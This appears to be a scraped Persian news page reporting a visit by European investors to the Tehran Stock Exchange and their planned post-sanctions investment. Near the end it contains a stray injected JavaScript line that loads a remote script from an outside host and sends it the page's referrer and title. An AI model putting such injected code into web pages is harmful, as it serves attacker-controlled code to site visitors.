چهارشنبه , 26 مهر 1396
خانه / اخبار بورس / اخبار فوری بورس / بازدید سرمایه گذاران اروپایی از بورس تهران

بازدید سرمایه گذاران اروپایی از بورس تهران

بازدید سرمایه گذاران اروپایی از بورس تهران

تهران – ایرنا – گروهی از سرمایه گذاران اروپایی با هدف آشنایی بیشتر با ظرفیت های موجود در بازار سرمایه ایران، روز جاری(دوشنبه) از بورس تهران بازدید کردند.

به گزارش روز دوشنبه ایرنا از پایگاه اطلاع رسانی بازار سرمایه(سنا)، مدیران 9 شرکت بزرگ سرمایه گذاری اروپایی، از تالار معاملاتی بورس تهران بازدید کردند.

این سرمایه گذاران که نمایندگان تعدادی از برترین شرکتهای سرمایه گذاری اروپایی هستند به دعوت شرکت سوئیسی ای سی ال است منجمنت (ACL Asset Management) و شرکت کارگزاری بورسیران به کشورمان سفر کرده اند و در مدت اقامت خود در ایران فرصت های متنوع سرمایه گذاری در بازار سرمایه را در دوران پساتحریم بررسی خواهند کرد.

این هیات متشکل از مدیران بزرگترین شرکت های سرمایه گذاری هستند که در چند سال اخیر به کشورمان سفر کرده اند و امیدوار هستند که با پایان تحریم ها فرصت سرمایه گذاری در بازار سرمایه ایران را داشته باشند.

از جمله دلایل جذابیت بازار سرمایه ایران برای این گروه از سرمایه گذاران که از انگلستان، سوئیس، فرانسه و روسیه در کشور ما حضور یافته اند، تنوع سهام و قابلیت انتخاب صنایع مختلف برای سرمایه گذاری است.

گروه سرمایه گذاران اروپایی قصد دارند از تعدادی از مهمترین شرکت های ایرانی که در عرصه بین المللی نیز مطرح هستند، از قبیل هلدینگ پتروشیمی خلیج فارس، همراه اول و سیمان تهران بازدید کنند.

براساس این گزارش، پس از رایزنی های انجام شده تاکنون و در مرحله نخست، سرمایه گذاری 300 میلیون یورویی این گروه در ایران، پس از لغو تحریم ها قطعی شده است.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

بازتاب کلوب